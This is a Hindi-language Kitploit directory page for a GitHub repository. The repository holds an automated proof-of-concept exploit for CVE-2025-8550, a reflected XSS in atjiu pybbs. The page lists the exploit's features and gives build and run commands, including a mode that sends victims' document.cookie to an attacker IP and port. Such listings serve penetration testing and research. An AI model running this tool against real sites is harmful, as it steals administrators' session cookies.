Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8550 — CVE-2025-8550 के लिए स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, atjiu pybbs में एक प्रतिबिंबित XSS। 20+ पेलोड विविधताएं, कुकी बहिर्वेशन, मल्टीथ्रेडिंग, और पैठ परीक्षण के लिए अनुकूलन योग्य CLI शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/bytereaper77/cve-2025-8550
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

CVE-2025-8550 के लिए स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, atjiu pybbs में एक प्रतिबिंबित XSS। 20+ पेलोड विविधताएं, कुकी बहिर्वेशन, मल्टीथ्रेडिंग, और पैठ परीक्षण के लिए अनुकूलन योग्य CLI शामिल हैं।

रिपॉजिटरी देखें
31111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8550 – atjiu pybbs XSS एक्सप्लॉइट

विवरण

यह रिपॉजिटरी CVE-2025-8550 के लिए एक स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट होस्ट करती है, जो atjiu pybbs (≤ v6.0.0) में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह /admin/topic/list एंडपॉइंट के username पैरामीटर को लक्षित करता है, जिसमें उचित इनपुट सैनिटाइजेशन का अभाव है।

विशेषताएँ

  • 20+ पेलोड विविधताएँ: script, SVG, iframe, object, onerror हैंडलर और अधिक।

  • स्वचालित URL एन्कोडिंग: libcurl के curl_easy_escape के माध्यम से सुरक्षित इंजेक्शन सुनिश्चित करता है।

  • कुकी एक्सफिल्ट्रेशन (वैकल्पिक): document.cookie को हमलावर-नियंत्रित सर्वर पर भेजने के लिए बीकन इंजेक्शन।

  • मल्टीथ्रेडिंग: प्रयासों को समानांतर करने और परीक्षण को गति देने के लिए pthreads का उपयोग करता है।

  • अनुकूलन योग्य CLI: argparse द्वारा संचालित, निम्नलिखित को निर्दिष्ट करने का समर्थन करता है:

  • लक्ष्य URL (-u / --url)
  • प्रमाणित अनुरोधों के लिए कुकी फ़ाइल (-c / --cookies)
  • कुकी पेलोड सक्षम करें (-k / --cokpay)
  • हमलावर सर्वर IP/पोर्ट (-i / --ip, -p / --port)
  • वर्बोज़ लॉगिंग (-v / --verbose)

निर्माण और उपयोग

root@kitploit:~
# एक्सप्लॉइट बाइनरी संकलित करें
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# लक्ष्य के विरुद्ध चलाएँ
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#कुकी भेजें :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • http://<TARGET> को atjiu pybbs के अपने इंस्टेंस से बदलें।
  • कुकी-चुराने वाले बीकन को सक्षम करने के लिए -k का उपयोग करें (-i और -p की आवश्यकता है)।
  • यदि प्रमाणीकरण कुकी की आवश्यकता नहीं है तो -c को छोड़ दें।

संदर्भ :

  • NVD प्रविष्टि : https://nvd.nist.gov/vuln/detail/CVE-2025-8550

लाइसेंस :

MIT लाइसेंस

टूल डाउनलोड करें